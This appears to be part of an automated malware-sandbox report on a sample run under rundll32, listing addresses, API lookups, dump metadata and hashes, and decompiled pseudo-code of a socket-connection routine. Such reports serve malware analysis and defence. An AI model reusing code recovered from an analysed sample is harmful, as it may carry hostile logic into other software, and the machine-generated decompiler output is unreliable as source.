                                                                                              0x0425c8ce
                                                                                              0x0425c7c5
                                                                                              0x0425c7c5
                                                                                              0x0425c7c7
                                                                                              0x0425c7ce
                                                                                              0x0425c7d4
                                                                                              0x0425c7d7
                                                                                              0x0425c7db
                                                                                              0x0425c7e5
                                                                                              0x0425c7e5
                                                                                              0x0425c7e7
                                                                                              0x0425c7f0
                                                                                              0x0425c7fc
                                                                                              0x0425c800
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0425c800
                                                                                              0x0425c805
                                                                                              0x0425c81f
                                                                                              0x0425c824
                                                                                              0x00000000
                                                                                              0x0425c82a
                                                                                              0x0425c830
                                                                                              0x0425c832
                                                                                              0x0425c835
                                                                                              0x0425c835
                                                                                              0x0425c837
                                                                                              0x0425c840
                                                                                              0x0425c84f
                                                                                              0x0425c853
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0425c853
                                                                                              0x0425c858
                                                                                              0x0425c922
                                                                                              0x0425c922
                                                                                              0x0425c928
                                                                                              0x00000000
                                                                                              0x0425c92a
                                                                                              0x0425c93a
                                                                                              0x0425c94c
                                                                                              0x0425c94c
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0425c85e
                                                                                              0x0425c85e
                                                                                              0x0425c85f
                                                                                              0x0425c873
                                                                                              0x0425c873
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0425c807
                                                                                              0x0425c807
                                                                                              0x0425c808
                                                                                              0x0425c81c
                                                                                              0x0425c81c
                                                                                              0x0425c7bf
                                                                                              0x0425c7ba
                                                                                              0x0425c65f
                                                                                              0x0425c666
                                                                                              0x00000000
                                                                                              0x0425c66c
                                                                                              0x0425c66c
                                                                                              0x0425c678
                                                                                              0x0425c6d1
                                                                                              0x0425c752
                                                                                              0x0425c758
                                                                                              0x0425c758
                                                                                              0x0425c75a
                                                                                              0x0425c761
                                                                                              0x0425c763
                                                                                              0x0425c76a
                                                                                              0x0425c771
                                                                                              0x0425c774
                                                                                              0x0425c77b
                                                                                              0x0425c781
                                                                                              0x0425c781
                                                                                              0x0425c783
                                                                                              0x0425c78f
                                                                                              0x0425c793
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0425c793
                                                                                              0x0425c798
                                                                                              0x0425c952
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0425c954
                                                                                              0x0425c956
                                                                                              0x0425c98c
                                                                                              0x0425c99b
                                                                                              0x0425c958
                                                                                              0x0425c95e
                                                                                              0x0425c960
                                                                                              0x0425c963
                                                                                              0x0425c963
                                                                                              0x0425c965
                                                                                              0x0425c971
                                                                                              0x0425c975
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0425c975
                                                                                              0x0425c97a
                                                                                              0x0425c986
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0425c988
                                                                                              0x0425c98a
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0425c97c
                                                                                              0x0425c97c
                                                                                              0x0425c97d
                                                                                              0x00000000
                                                                                              0x0425c981
                                                                                              0x00000000
                                                                                              0x0425c79e
                                                                                              0x0425c79e
                                                                                              0x0425c79f
                                                                                              0x00000000
                                                                                              0x0425c7a3
                                                                                              0x00000000
                                                                                              0x0425c6d3
                                                                                              0x0425c6d3
                                                                                              0x0425c6d5
                                                                                              0x0425c6dc
                                                                                              0x0425c6e3
                                                                                              0x0425c6e6
                                                                                              0x0425c6f0
                                                                                              0x0425c6f0
                                                                                              0x0425c6f2
                                                                                              0x0425c6fe
                                                                                              0x0425c702
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0425c702
                                                                                              0x0425c707
                                                                                              0x0425c721
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0425c709
                                                                                              0x0425c709
                                                                                              0x0425c70a
                                                                                              0x0425c71e
                                                                                              0x0425c71e
                                                                                              0x0425c67a
                                                                                              0x0425c67a
                                                                                              0x0425c67c
                                                                                              0x0425c683
                                                                                              0x0425c68a
                                                                                              0x0425c690
                                                                                              0x0425c690
                                                                                              0x0425c692
                                                                                              0x0425c69e
                                                                                              0x0425c6a2
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0425c6a2
                                                                                              0x0425c6a7
                                                                                              0x0425c6c1
                                                                                              0x0425c724
                                                                                              0x0425c724
                                                                                              0x0425c726
                                                                                              0x00000000
                                                                                              0x0425c72c
                                                                                              0x0425c737
                                                                                              0x0425c749
                                                                                              0x0425c749
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0425c6a9
                                                                                              0x0425c6a9
                                                                                              0x0425c6aa
                                                                                              0x0425c6be
                                                                                              0x0425c6be
                                                                                              0x0425c678
                                                                                              0x0425c666
                                                                                              0x0425c659
                                                                                              0x0425c642
                                                                                              0x0425c607
                                                                                              0x0425c5f0
                                                                                              0x0425c5d1
                                                                                              0x0425c5c0
                                                                                              0x00000000

                                                                                              APIs
                                                                                              • GetModuleHandleA.KERNEL32(ntdll,00000000,74CB43E0), ref: 0425C58C
                                                                                              • GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 0425C5B8
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: AddressHandleModuleProc
                                                                                              • String ID: RtlGetVersion$h$ntdll$V
                                                                                              • API String ID: 1646373207-3705289206
                                                                                              • Opcode ID: 4bfd651f855bfdc0b9d05b83898ee3d6182970aa74d5b663952ad2fa55e179b9
                                                                                              • Instruction ID: 7593a2cf7ec25112e6005adbb64a5bdf3837e16801877e5c001fdad19aedd4ae
                                                                                              • Opcode Fuzzy Hash: 4bfd651f855bfdc0b9d05b83898ee3d6182970aa74d5b663952ad2fa55e179b9
                                                                                              • Instruction Fuzzy Hash: E1C11832B202198BCB398F59D4D46BDF7A4FF45310F6411AECC965B660FB31A946CB84
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 23%
                                                                                              			E04273DA0(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags, long _a4, intOrPtr _a8, signed int _a12, signed int _a16, signed int* _a20, signed short* _a24) {
                                                                                              				signed int _v8;
                                                                                              				signed int _v12;
                                                                                              				signed int _v16;
                                                                                              				signed int _v20;
                                                                                              				signed int _v24;
                                                                                              				signed int _v28;
                                                                                              				intOrPtr* _v32;
                                                                                              				intOrPtr* _v36;
                                                                                              				signed short _v50;
                                                                                              				char _v52;
                                                                                              				long _v56;
                                                                                              				signed int* _v60;
                                                                                              				intOrPtr _v64;
                                                                                              				void* _v76;
                                                                                              				intOrPtr* _v116;
                                                                                              				intOrPtr _v124;
                                                                                              				intOrPtr _v128;
                                                                                              				intOrPtr _v136;
                                                                                              				signed int _v148;
                                                                                              				intOrPtr _v152;
                                                                                              				intOrPtr _v156;
                                                                                              				long _v160;
                                                                                              				signed int _v164;
                                                                                              				intOrPtr _v168;
                                                                                              				signed int _v184;
                                                                                              				char _v188;
                                                                                              				intOrPtr _v192;
                                                                                              				intOrPtr _v196;
                                                                                              				signed int _v208;
                                                                                              				intOrPtr _v212;
                                                                                              				char _v216;
                                                                                              				signed int _t124;
                                                                                              				signed short _t127;
                                                                                              				void* _t128;
                                                                                              				signed int _t129;
                                                                                              				signed int _t130;
                                                                                              				signed int* _t131;
                                                                                              				intOrPtr _t132;
                                                                                              				signed int* _t135;
                                                                                              				void* _t137;
                                                                                              				signed int _t139;
                                                                                              				void* _t141;
                                                                                              				signed int _t144;
                                                                                              				intOrPtr _t154;
                                                                                              				signed int _t156;
                                                                                              				long _t160;
                                                                                              				long _t163;
                                                                                              				signed int _t165;
                                                                                              				signed int _t174;
                                                                                              				void* _t175;
                                                                                              				signed int _t176;
                                                                                              				long _t177;
                                                                                              				signed int _t180;
                                                                                              				signed int _t185;
                                                                                              				signed int _t187;
                                                                                              				long _t188;
                                                                                              				signed short _t191;
                                                                                              				signed int* _t195;
                                                                                              				signed int _t206;
                                                                                              				signed int _t209;
                                                                                              				signed int* _t210;
                                                                                              				signed int _t211;
                                                                                              				intOrPtr _t213;
                                                                                              				void* _t214;
                                                                                              				long _t222;
                                                                                              				signed int _t223;
                                                                                              				signed int _t225;
                                                                                              				intOrPtr* _t228;
                                                                                              				signed int _t229;
                                                                                              				signed int _t243;
                                                                                              				intOrPtr _t250;
                                                                                              				signed int _t252;
                                                                                              				signed int _t257;
                                                                                              				signed int _t261;
                                                                                              				signed short* _t265;
                                                                                              				intOrPtr* _t266;
                                                                                              				signed int _t268;
                                                                                              				signed int _t269;
                                                                                              				long _t270;
                                                                                              				intOrPtr _t277;
                                                                                              				signed short* _t278;
                                                                                              				signed int _t279;
                                                                                              				struct _CRITICAL_SECTION* _t281;
                                                                                              				intOrPtr _t283;
                                                                                              				intOrPtr _t285;
                                                                                              				signed int _t291;
                                                                                              				signed int _t292;
                                                                                              				signed int _t293;
                                                                                              				signed int _t294;
                                                                                              				void* _t295;
                                                                                              				signed int _t296;
                                                                                              				signed int _t297;
                                                                                              
                                                                                              				_t124 =  *0x42a4008; // 0xd33db39d
                                                                                              				_v8 = _t124 ^ _t291;
                                                                                              				_push(__ebx);
                                                                                              				_t209 = _a12;
                                                                                              				_push(__esi);
                                                                                              				_t277 = __ecx;
                                                                                              				_v56 = _a4;
                                                                                              				_v60 = _a20;
                                                                                              				_push(__edi);
                                                                                              				_t265 = _a24;
                                                                                              				_v64 = __ecx;
                                                                                              				_t127 = E0426D020(_a4, __ecx);
                                                                                              				_t250 = _a8;
                                                                                              				_t222 = _v56;
                                                                                              				 *_t265 = _t127;
                                                                                              				_push(_t265);
                                                                                              				if(_t127 == 0) {
                                                                                              					_t128 = E0426D160(_t209, _t222, _t250, _t265, __ecx, __eflags);
                                                                                              				} else {
                                                                                              					_t128 = E0426D0D0(_t209, _t250, _t265, __ecx);
                                                                                              				}
                                                                                              				_t296 = _t295 + 4;
                                                                                              				if(_t128 != 0) {
                                                                                              					_t278 = _t277 + 0x5c;
                                                                                              					__eflags = _t209;
                                                                                              					if(_t209 == 0) {
                                                                                              						L9:
                                                                                              						_t129 =  *_t278 & 0x0000ffff;
                                                                                              						__eflags = _t129 - 2;
                                                                                              						if(_t129 == 2) {
                                                                                              							L14:
                                                                                              							_v56 = 1;
                                                                                              							__eflags = _t129 -  *_t265;
                                                                                              							if(_t129 ==  *_t265) {
                                                                                              								goto L12;
                                                                                              							} else {
                                                                                              								goto L35;
                                                                                              							}
                                                                                              						} else {
                                                                                              							__eflags = _t129 - 0x17;
                                                                                              							if(_t129 == 0x17) {
                                                                                              								goto L14;
                                                                                              							} else {
                                                                                              								_v56 = 0;
                                                                                              								L12:
                                                                                              								_t130 =  *_t265 & 0x0000ffff;
                                                                                              								_t210 = 0;
                                                                                              								__imp__#23(_t130, 1, 6);
                                                                                              								_t223 = _t130;
                                                                                              								_t131 = _v60;
                                                                                              								 *_t131 = _t223;
                                                                                              								__eflags = _t223 - 0xffffffff;
                                                                                              								if(_t223 != 0xffffffff) {
                                                                                              									_t132 = _v64;
                                                                                              									__eflags =  *(_t132 + 0x30);
                                                                                              									if( *(_t132 + 0x30) == 0) {
                                                                                              										L19:
                                                                                              										_t252 = 0;
                                                                                              										__eflags = 0;
                                                                                              									} else {
                                                                                              										__eflags =  *(_t132 + 0x34);
                                                                                              										if( *(_t132 + 0x34) <= 0) {
                                                                                              											goto L19;
                                                                                              										} else {
                                                                                              											_t252 = 1;
                                                                                              										}
                                                                                              									}
                                                                                              									_v20 = _t252;
                                                                                              									_v12 =  *(_t132 + 0x34);
                                                                                              									_t135 =  &_v20;
                                                                                              									_v16 =  *(_t132 + 0x30);
                                                                                              									__imp__WSAIoctl(_t223, 0x98000004, _t135, 0xc, 0, 0,  &_v24, 0, 0);
                                                                                              									__eflags = _t135 - 0xffffffff;
                                                                                              									if(_t135 != 0xffffffff) {
                                                                                              										L23:
                                                                                              										_t223 =  *_v60;
                                                                                              										_t137 = E0426D490(_t210, _t223,  *((intOrPtr*)(_v64 + 4)), _t265, _t278);
                                                                                              										__eflags = _t137 - 0xffffffff;
                                                                                              										if(_t137 == 0xffffffff) {
                                                                                              											goto L37;
                                                                                              										} else {
                                                                                              											_t243 = _a16;
                                                                                              											__eflags = _t243;
                                                                                              											if(_t243 != 0) {
                                                                                              												__eflags = _v56 - _t210;
                                                                                              												if(_v56 == _t210) {
                                                                                              													__eflags =  *_t265 - 2;
                                                                                              													_t278 =  !=  ? 0x42a66e4 : 0x42a66c8;
                                                                                              												}
                                                                                              												asm("movups xmm0, [esi]");
                                                                                              												_t30 =  &(_t278[0xc]); // 0x0
                                                                                              												_t191 =  *_t30;
                                                                                              												asm("movups [ebp-0x30], xmm0");
                                                                                              												_v28 = _t191;
                                                                                              												asm("movq xmm0, [esi+0x10]");
                                                                                              												asm("movq [ebp-0x20], xmm0");
                                                                                              												__imp__#9(_t243);
                                                                                              												__eflags = _v52 - 2;
                                                                                              												_v50 = _t191;
                                                                                              												_t193 =  ==  ? 0x10 : 0x1c;
                                                                                              												__eflags = 0x1c;
                                                                                              												_push( ==  ? 0x10 : 0x1c);
                                                                                              												_push( &_v52);
                                                                                              											} else {
                                                                                              												__eflags = _v56 - _t210;
                                                                                              												if(_v56 == _t210) {
                                                                                              													__eflags =  *_t265 - 2;
                                                                                              													_t278 =  !=  ? 0x42a66e4 : 0x42a66c8;
                                                                                              												}
                                                                                              												__eflags =  *_t278 - 2;
                                                                                              												_t200 =  !=  ? 0x1c : 0x10;
                                                                                              												_push( !=  ? 0x1c : 0x10);
                                                                                              												_push(_t278);
                                                                                              											}
                                                                                              											_t195 = _v60;
                                                                                              											__imp__#2( *_t195);
                                                                                              											__eflags = _t195 - 0xffffffff;
                                                                                              											if(_t195 == 0xffffffff) {
                                                                                              												_t131 =  *__imp__#111();
                                                                                              												goto L33;
                                                                                              											}
                                                                                              											goto L34;
                                                                                              										}
                                                                                              									} else {
                                                                                              										__imp__#111();
                                                                                              										__eflags = _t135 - 0x2733;
                                                                                              										if(_t135 == 0x2733) {
                                                                                              											goto L23;
                                                                                              										} else {
                                                                                              											__eflags = _t135 - 0xffffffff;
                                                                                              											if(_t135 == 0xffffffff) {
                                                                                              												_push(0x80004005);
                                                                                              												E04257AC0();
                                                                                              												L37:
                                                                                              												_push(0x80004005);
                                                                                              												E04257AC0();
                                                                                              												asm("int3");
                                                                                              												asm("int3");
                                                                                              												asm("int3");
                                                                                              												asm("int3");
                                                                                              												asm("int3");
                                                                                              												asm("int3");
                                                                                              												asm("int3");
                                                                                              												asm("int3");
                                                                                              												asm("int3");
                                                                                              												asm("int3");
                                                                                              												asm("int3");
                                                                                              												asm("int3");
                                                                                              												asm("int3");
                                                                                              												asm("int3");
                                                                                              												asm("int3");
                                                                                              												asm("int3");
                                                                                              												asm("int3");
                                                                                              												asm("int3");
                                                                                              												asm("int3");
                                                                                              												_push(_t291);
                                                                                              												_t292 = _t296;
                                                                                              												_push(_t210);
                                                                                              												_push(_t278);
                                                                                              												_t211 = _t223;
                                                                                              												_push(_t265);
                                                                                              												_t266 = _v116;
                                                                                              												_t279 = _t211 + 0x178;
                                                                                              												_t139 = E04275300(_t279, _t223, _t266);
                                                                                              												__eflags = _t139;
                                                                                              												if(_t139 != 0) {
                                                                                              													SetLastError(0);
                                                                                              													_t225 = _t211;
                                                                                              													_t141 =  *((intOrPtr*)( *_t211 + 0xd8))( *_t266, _a4);
                                                                                              													__eflags = _t141 - 2;
                                                                                              													if(_t141 != 2) {
                                                                                              														__eflags = 0;
                                                                                              														return 0;
                                                                                              													} else {
                                                                                              														_t213 =  *_t266;
                                                                                              														_t268 =  *(_t279 + 4);
                                                                                              														__eflags = _t268;
                                                                                              														if(_t268 == 0) {
                                                                                              															L47:
                                                                                              															_push(0x80004005);
                                                                                              															E04257AC0();
                                                                                              															asm("int3");
                                                                                              															asm("int3");
                                                                                              															asm("int3");
                                                                                              															asm("int3");
                                                                                              															asm("int3");
                                                                                              															asm("int3");
                                                                                              															asm("int3");
                                                                                              															asm("int3");
                                                                                              															asm("int3");
                                                                                              															asm("int3");
                                                                                              															asm("int3");
                                                                                              															asm("int3");
                                                                                              															asm("int3");
                                                                                              															asm("int3");
                                                                                              															_push(_t292);
                                                                                              															_t293 = _t296;
                                                                                              															_t297 = _t296 - 0x18;
                                                                                              															_t144 =  *0x42a4008; // 0xd33db39d
                                                                                              															_v148 = _t144 ^ _t293;
                                                                                              															_push(_t213);
                                                                                              															_push(_t279);
                                                                                              															_v152 = _v136;
                                                                                              															_push(_t268);
                                                                                              															_t269 = _t225;
                                                                                              															_v156 = _v128;
                                                                                              															_v168 = _v124;
                                                                                              															_v164 = _t269;
                                                                                              															_v160 = 0;
                                                                                              															__eflags = E0426C880(_t269 + 0xb0,  &_v160);
                                                                                              															if(__eflags != 0) {
                                                                                              																_t214 = _v28;
                                                                                              															} else {
                                                                                              																_t285 =  *((intOrPtr*)(_t269 + 0xa4));
                                                                                              																_t214 = RtlAllocateHeap( *(_t269 + 0x94), 0, _t285 + 0x38);
                                                                                              																_v28 = _t214;
                                                                                              																_t68 = _t214 + 0x38; // 0x38
                                                                                              																 *(_t214 + 0x14) = _t269 + 0x94;
                                                                                              																 *((intOrPtr*)(_t214 + 0x24)) = _t285;
                                                                                              																 *((intOrPtr*)(_t214 + 0x20)) = _t68;
                                                                                              															}
                                                                                              															_push(_v24);
                                                                                              															asm("xorps xmm0, xmm0");
                                                                                              															_push(_v20);
                                                                                              															asm("movups [ebx], xmm0");
                                                                                              															 *(_t214 + 0x10) = 0;
                                                                                              															 *(_t214 + 0x1c) = 0;
                                                                                              															 *(_t214 + 0x1c) =  *(_t269 + 0x18);
                                                                                              															_t270 = E042727F0(_t269, __eflags);
                                                                                              															_t79 = _t270 + 0x54; // 0x54
                                                                                              															_t281 = _t79;
                                                                                              															EnterCriticalSection(_t281);
                                                                                              															_push(_a12);
                                                                                              															_t228 = _v32;
                                                                                              															E04272A10(_t228, _t281, _v20, _t270, _v36, _t269);
                                                                                              															_t154 = _v32;
                                                                                              															__eflags =  *(_t154 + 0x4c);
                                                                                              															if( *(_t154 + 0x4c) == 0) {
                                                                                              																_t228 = _v36;
                                                                                              																__eflags =  *_t228 - 2;
                                                                                              																_t156 =  !=  ? 0x1c : 0x10;
                                                                                              																__imp__#4( *(_t270 + 0x88), _t228, 0x10);
                                                                                              																__eflags = 0x10 - 0xffffffff;
                                                                                              																if(0x10 == 0xffffffff) {
                                                                                              																	__imp__#111();
                                                                                              																	goto L63;
                                                                                              																} else {
                                                                                              																	_t163 =  &_v20;
                                                                                              																	_v20 = 1;
                                                                                              																	__imp__#10( *(_t270 + 0x88), 0x8004667e, _t163);
                                                                                              																	__eflags = _t163;
                                                                                              																	if(_t163 != 0) {
                                                                                              																		goto L70;
                                                                                              																	} else {
                                                                                              																		_t174 = CreateIoCompletionPort( *(_t270 + 0x88),  *(_v32 + 0x50), _t270, _t163);
                                                                                              																		__eflags = _t174;
                                                                                              																		if(_t174 == 0) {
                                                                                              																			goto L55;
                                                                                              																		} else {
                                                                                              																			 *(_t270 + 0x48) = 1;
                                                                                              																			_t175 = E042720F0(_v32, _t270);
                                                                                              																			__eflags = _t175 - 2;
                                                                                              																			if(_t175 == 2) {
                                                                                              																				_t176 = GetLastError();
                                                                                              																				__eflags = _t176;
                                                                                              																				_t156 =  ==  ? 0x4c7 : _t176;
                                                                                              																				goto L63;
                                                                                              																			} else {
                                                                                              																				_t156 = E04273AC0(_t214, _v32, _t270, _t281, _t270, _t214);
                                                                                              																				_t229 = 0;
                                                                                              																			}
                                                                                              																		}
                                                                                              																		goto L64;
                                                                                              																	}
                                                                                              																}
                                                                                              															} else {
                                                                                              																_t177 =  &_v24;
                                                                                              																_v24 = 1;
                                                                                              																__imp__#10( *(_t270 + 0x88), 0x8004667e, _t177);
                                                                                              																__eflags = _t177;
                                                                                              																if(_t177 != 0) {
                                                                                              																	_push(0x80004005);
                                                                                              																	E04257AC0();
                                                                                              																	L70:
                                                                                              																	E04257AC0();
                                                                                              																	asm("int3");
                                                                                              																	asm("int3");
                                                                                              																	asm("int3");
                                                                                              																	asm("int3");
                                                                                              																	asm("int3");
                                                                                              																	asm("int3");
                                                                                              																	asm("int3");
                                                                                              																	asm("int3");
                                                                                              																	_t294 = _t297;
                                                                                              																	_t165 =  *0x42a4008; // 0xd33db39d
                                                                                              																	_v208 = _t165 ^ _t294;
                                                                                              																	_t257 = _v184;
                                                                                              																	__eflags = _t257;
                                                                                              																	_t283 = _v192;
                                                                                              																	_v216 = _v188;
                                                                                              																	_t169 =  ==  ? _t283 : _t283 + _t257;
                                                                                              																	_v212 =  ==  ? _t283 : _t283 + _t257;
                                                                                              																	 *((intOrPtr*)( *_t228 + 8))( &_v216, 1, _t281, _t293, 0x80004005);
                                                                                              																	__eflags = _v208 ^ _t294;
                                                                                              																	return E04275AFE(_v208 ^ _t294, _v196);
                                                                                              																} else {
                                                                                              																	_t180 = CreateIoCompletionPort( *(_t270 + 0x88),  *(_v32 + 0x50), _t270, _t177);
                                                                                              																	__eflags = _t180;
                                                                                              																	if(_t180 == 0) {
                                                                                              																		L55:
                                                                                              																		_t156 = GetLastError();
                                                                                              																	} else {
                                                                                              																		_t156 = E0426D560( *((intOrPtr*)(_v32 + 0x40)),  *(_t270 + 0x88), _v36, _t214);
                                                                                              																	}
                                                                                              																	L63:
                                                                                              																	_t229 = 1;
                                                                                              																	L64:
                                                                                              																	_v28 = _t156;
                                                                                              																	__eflags = _t156;
                                                                                              																	if(_t156 != 0) {
                                                                                              																		__eflags = _t229;
                                                                                              																		if(_t229 != 0) {
                                                                                              																			E04272920(_v32, _t270, 0, 0, 0);
                                                                                              																			_t160 = E0426C930(_v32 + 0xb0, _t214);
                                                                                              																			__eflags = _t160;
                                                                                              																			if(_t160 == 0) {
                                                                                              																				HeapFree( *( *(_t214 + 0x14)), _t160, _t214);
                                                                                              																			}
                                                                                              																		}
                                                                                              																	}
                                                                                              																	LeaveCriticalSection(_t281);
                                                                                              																	__eflags = _v16 ^ _t293;
                                                                                              																	return E04275AFE(_v16 ^ _t293);
                                                                                              																}
                                                                                              															}
                                                                                              														} else {
                                                                                              															_t185 = _t213 - 1;
                                                                                              															_t261 = _t185 %  *_t279;
                                                                                              															_t225 =  *( *((intOrPtr*)(_t279 + 0x44)) + _t261) & 0x000000ff;
                                                                                              															__eflags = _t185 /  *_t279 - _t225;
                                                                                              															if(_t185 /  *_t279 != _t225) {
                                                                                              																goto L47;
                                                                                              															} else {
                                                                                              																__eflags =  *((intOrPtr*)(_t268 + _t261 * 4)) - 1;
                                                                                              																if( *((intOrPtr*)(_t268 + _t261 * 4)) != 1) {
                                                                                              																	goto L47;
                                                                                              																} else {
                                                                                              																	_t296 = _t296 - 8;
                                                                                              																	_t225 = _t279;
                                                                                              																	_t187 = E042751B0(_t213, _t225, _t268, _t279, _t213, 0);
                                                                                              																	__eflags = _t187;
                                                                                              																	if(_t187 == 0) {
                                                                                              																		goto L47;
                                                                                              																	} else {
                                                                                              																		_t188 = GetLastError();
                                                                                              																		__eflags = _t188;
                                                                                              																		_t189 =  ==  ? 0x4c7 : _t188;
                                                                                              																		return  ==  ? 0x4c7 : _t188;
                                                                                              																	}
                                                                                              																}
                                                                                              															}
                                                                                              														}
                                                                                              													}
                                                                                              												} else {
                                                                                              													return 0x4d6;
                                                                                              												}
                                                                                              											} else {
                                                                                              												goto L23;
                                                                                              											}
                                                                                              										}
                                                                                              									}
                                                                                              								} else {
                                                                                              									__imp__#111();
                                                                                              									L33:
                                                                                              									_t210 = _t131;
                                                                                              									L34:
                                                                                              									goto L35;
                                                                                              								}
                                                                                              							}
                                                                                              						}
                                                                                              					} else {
                                                                                              						__eflags =  *_t209;
                                                                                              						if( *_t209 == 0) {
                                                                                              							goto L9;
                                                                                              						} else {
                                                                                              							E04291B10();
                                                                                              							_t278 = _t296;
                                                                                              							 *_t278 = E0426D020(_t209, _t278);
                                                                                              							_t206 = E0426D0D0(_t209, 0, _t265, _t278, _t278);
                                                                                              							_t296 = _t296 + 4;
                                                                                              							__eflags = _t206;
                                                                                              							if(_t206 != 0) {
                                                                                              								goto L9;
                                                                                              							} else {
                                                                                              								__imp__#111();
                                                                                              								goto L35;
                                                                                              							}
                                                                                              						}
                                                                                              					}
                                                                                              				} else {
                                                                                              					L35:
                                                                                              					return E04275AFE(_v8 ^ _t291);
                                                                                              				}
                                                                                              			}































































































                                                                                              0x04273da6
                                                                                              0x04273dad
                                                                                              0x04273db3
                                                                                              0x04273db4
                                                                                              0x04273db7
                                                                                              0x04273db8
                                                                                              0x04273dba
                                                                                              0x04273dc0
                                                                                              0x04273dc5
                                                                                              0x04273dc6
                                                                                              0x04273dc9
                                                                                              0x04273dcc
                                                                                              0x04273dd1
                                                                                              0x04273dd4
                                                                                              0x04273dd7
                                                                                              0x04273dda
                                                                                              0x04273dde
                                                                                              0x04273de7
                                                                                              0x04273de0
                                                                                              0x04273de0
                                                                                              0x04273de0
                                                                                              0x04273dec
                                                                                              0x04273df1
                                                                                              0x04273dfd
                                                                                              0x04273e00
                                                                                              0x04273e02
                                                                                              0x04273e3c
                                                                                              0x04273e3c
                                                                                              0x04273e3f
                                                                                              0x04273e42
                                                                                              0x04273e77
                                                                                              0x04273e77
                                                                                              0x04273e7e
                                                                                              0x04273e81
                                                                                              0x00000000
                                                                                              0x04273e83
                                                                                              0x00000000
                                                                                              0x04273e83
                                                                                              0x04273e44
                                                                                              0x04273e44
                                                                                              0x04273e47
                                                                                              0x00000000
                                                                                              0x04273e49
                                                                                              0x04273e49
                                                                                              0x04273e50
                                                                                              0x04273e50
                                                                                              0x04273e53
                                                                                              0x04273e5a
                                                                                              0x04273e60
                                                                                              0x04273e62
                                                                                              0x04273e65
                                                                                              0x04273e67
                                                                                              0x04273e6a
                                                                                              0x04273e8d
                                                                                              0x04273e93
                                                                                              0x04273e95
                                                                                              0x04273ea3
                                                                                              0x04273ea3
                                                                                              0x04273ea3
                                                                                              0x04273e97
                                                                                              0x04273e97
                                                                                              0x04273e9a
                                                                                              0x00000000
                                                                                              0x04273e9c
                                                                                              0x04273e9c
                                                                                              0x04273e9c
                                                                                              0x04273e9a
                                                                                              0x04273ea9
                                                                                              0x04273eb2
                                                                                              0x04273ebf
                                                                                              0x04273ec2
                                                                                              0x04273ecc
                                                                                              0x04273ed2
                                                                                              0x04273ed5
                                                                                              0x04273eed
                                                                                              0x04273ef3
                                                                                              0x04273ef8
                                                                                              0x04273efd
                                                                                              0x04273f00
                                                                                              0x00000000
                                                                                              0x04273f06
                                                                                              0x04273f06
                                                                                              0x04273f09
                                                                                              0x04273f0c
                                                                                              0x04273f39
                                                                                              0x04273f3c
                                                                                              0x04273f3e
                                                                                              0x04273f4c
                                                                                              0x04273f4c
                                                                                              0x04273f4f
                                                                                              0x04273f52
                                                                                              0x04273f52
                                                                                              0x04273f56
                                                                                              0x04273f5a
                                                                                              0x04273f5d
                                                                                              0x04273f62
                                                                                              0x04273f67
                                                                                              0x04273f6d
                                                                                              0x04273f77
                                                                                              0x04273f80
                                                                                              0x04273f80
                                                                                              0x04273f83
                                                                                              0x04273f87
                                                                                              0x04273f0e
                                                                                              0x04273f0e
                                                                                              0x04273f11
                                                                                              0x04273f13
                                                                                              0x04273f21
                                                                                              0x04273f21
                                                                                              0x04273f24
                                                                                              0x04273f32
                                                                                              0x04273f35
                                                                                              0x04273f36
                                                                                              0x04273f36
                                                                                              0x04273f88
                                                                                              0x04273f8d
                                                                                              0x04273f93
                                                                                              0x04273f96
                                                                                              0x04273f9d
                                                                                              0x00000000
                                                                                              0x04273f9d
                                                                                              0x00000000
                                                                                              0x04273f96
                                                                                              0x04273ed7
                                                                                              0x04273ed7
                                                                                              0x04273edd
                                                                                              0x04273ee2
                                                                                              0x00000000
                                                                                              0x04273ee4
                                                                                              0x04273ee4
                                                                                              0x04273ee7
                                                                                              0x04273fb9
                                                                                              0x04273fbe
                                                                                              0x04273fc3
                                                                                              0x04273fc3
                                                                                              0x04273fc8
                                                                                              0x04273fcd
                                                                                              0x04273fce
                                                                                              0x04273fcf
                                                                                              0x04273fd0
                                                                                              0x04273fd1
                                                                                              0x04273fd2
                                                                                              0x04273fd3
                                                                                              0x04273fd4
                                                                                              0x04273fd5
                                                                                              0x04273fd6
                                                                                              0x04273fd7
                                                                                              0x04273fd8
                                                                                              0x04273fd9
                                                                                              0x04273fda
                                                                                              0x04273fdb
                                                                                              0x04273fdc
                                                                                              0x04273fdd
                                                                                              0x04273fde
                                                                                              0x04273fdf
                                                                                              0x04273fe0
                                                                                              0x04273fe1
                                                                                              0x04273fe3
                                                                                              0x04273fe4
                                                                                              0x04273fe5
                                                                                              0x04273fe7
                                                                                              0x04273fe8
                                                                                              0x04273fec
                                                                                              0x04273ff5
                                                                                              0x04273ffa
                                                                                              0x04273ffc
                                                                                              0x0427400c
